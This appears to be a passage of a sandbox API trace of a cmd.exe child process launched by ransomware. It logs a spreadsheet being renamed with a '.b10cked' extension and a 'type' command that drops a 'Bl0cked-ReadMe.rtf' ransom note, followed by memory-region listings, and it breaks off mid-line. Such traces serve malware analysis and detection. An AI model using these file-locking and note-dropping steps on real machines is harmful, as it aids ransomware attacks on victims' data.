[0127.850] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.852] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2=".") returned 52 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2="..") returned 52 [0127.852] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm~1.xls")) returned 0x20 [0127.852] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3020d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.852] SetErrorMode (uMode=0x0) returned 0x0 [0127.852] SetErrorMode (uMode=0x1) returned 0x0 [0127.852] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", nBufferLength=0x104, lpBuffer=0x1aeadc, lpFilePart=0x1aeac4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", lpFilePart=0x1aeac4*="BS0-NM~1.XLS") returned 0x48 [0127.852] SetErrorMode (uMode=0x0) returned 0x1 [0127.852] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x10 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2=".") returned 52 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2="..") returned 52 [0127.852] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm~1.xls")) returned 0x20 [0127.853] SetErrorMode (uMode=0x0) returned 0x0 [0127.853] SetErrorMode (uMode=0x1) returned 0x0 [0127.853] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", nBufferLength=0x104, lpBuffer=0x1aef58, lpFilePart=0x1aecf0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", lpFilePart=0x1aecf0*="BS0-NM~1.XLS") returned 0x48 [0127.853] SetErrorMode (uMode=0x0) returned 0x1 [0127.853] SetErrorMode (uMode=0x0) returned 0x0 [0127.853] SetErrorMode (uMode=0x1) returned 0x0 [0127.853] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1af160, lpFilePart=0x1aecf0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", lpFilePart=0x1aecf0*="BS0-Nm2046.xlsx.b10cked") returned 0x53 [0127.853] SetErrorMode (uMode=0x0) returned 0x1 [0127.853] SetLastError (dwErrCode=0x0) [0127.853] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx.b10cked")) returned 0xffffffff [0127.853] GetLastError () returned 0x2 [0127.853] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x1ae66c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae66c) returned 0x3022e8 [0127.853] FindNextFileW (in: hFindFile=0x3022e8, lpFindFileData=0x1ae66c | out: lpFindFileData=0x1ae66c) returned 0 [0127.854] GetLastError () returned 0x12 [0127.854] FindClose (in: hFindFile=0x3022e8 | out: hFindFile=0x3022e8) returned 1 [0127.856] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x301e78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301e78) returned 0x3022e8 [0127.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", lpFilePart=0x0) returned 0x53 [0127.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx", nBufferLength=0x104, lpBuffer=0x1ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx", lpFilePart=0x0) returned 0x4b [0127.856] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx")) returned 0x20 [0127.856] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx.b10cked"), dwFlags=0x3) returned 1 [0127.856] FindClose (in: hFindFile=0x3022e8 | out: hFindFile=0x3022e8) returned 1 [0127.857] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae8b8 | out: _Buffer=" 1") returned 9 [0127.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.857] GetFileType (hFile=0x7) returned 0x2 [0127.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae844 | out: lpMode=0x1ae844) returned 1 [0127.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.857] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae878 | out: lpConsoleScreenBufferInfo=0x1ae878) returned 1 [0127.857] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0127.858] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ae8b8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0127.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae89c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ae89c*=0x1a) returned 1 [0127.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.858] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.858] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.858] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.859] SetConsoleInputExeNameW () returned 0x1 [0127.859] GetConsoleOutputCP () returned 0x1b5 [0127.859] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.859] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.859] exit (_Code=0) Process: id = "81" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0x83c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10373 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10374 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10375 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10376 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10377 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10378 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10379 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10380 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10381 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 10382 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10417 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10418 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10419 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10420 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 10421 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10422 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10423 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10424 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10425 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10426 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10427 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10428 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10429 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10430 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10431 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 10432 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10433 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10434 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10435 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10436 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10437 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10438 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 10439 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 10440 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 138 os_tid = 0x84c [0127.771] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f8ac | out: lpSystemTimeAsFileTime=0x28f8ac*(dwLowDateTime=0x86167380, dwHighDateTime=0x1d440a9)) [0127.771] GetCurrentProcessId () returned 0x83c [0127.771] GetCurrentThreadId () returned 0x84c [0127.771] GetTickCount () returned 0x28fff [0127.771] QueryPerformanceCounter (in: lpPerformanceCount=0x28f8a4 | out: lpPerformanceCount=0x28f8a4*=18456046653) returned 1 [0127.772] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.772] __set_app_type (_Type=0x1) [0127.772] __p__fmode () returned 0x76b331f4 [0127.772] __p__commode () returned 0x76b331fc [0127.772] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.772] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.772] GetCurrentThreadId () returned 0x84c [0127.772] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x84c) returned 0x38 [0127.772] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.772] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.772] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.772] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f83c | out: phkResult=0x28f83c*=0x0) returned 0x2 [0127.773] VirtualQuery (in: lpAddress=0x28f873, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0127.773] GetConsoleOutputCP () returned 0x1b5 [0127.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.773] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.773] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.773] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.774] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.774] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.774] GetEnvironmentStringsW () returned 0x2f01d8* [0127.774] FreeEnvironmentStringsW (penv=0x2f01d8) returned 1 [0127.774] GetEnvironmentStringsW () returned 0x2f01d8* [0127.774] FreeEnvironmentStringsW (penv=0x2f01d8) returned 1 [0127.774] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e7ac | out: phkResult=0x28e7ac*=0x40) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x0, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x0, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.774] RegCloseKey (hKey=0x40) returned 0x0 [0127.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e7ac | out: phkResult=0x28e7ac*=0x40) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x0, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x9, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x9, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x9, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.775] RegCloseKey (hKey=0x40) returned 0x0 [0127.775] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886362 [0127.775] srand (_Seed=0x5b886362) [0127.775] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 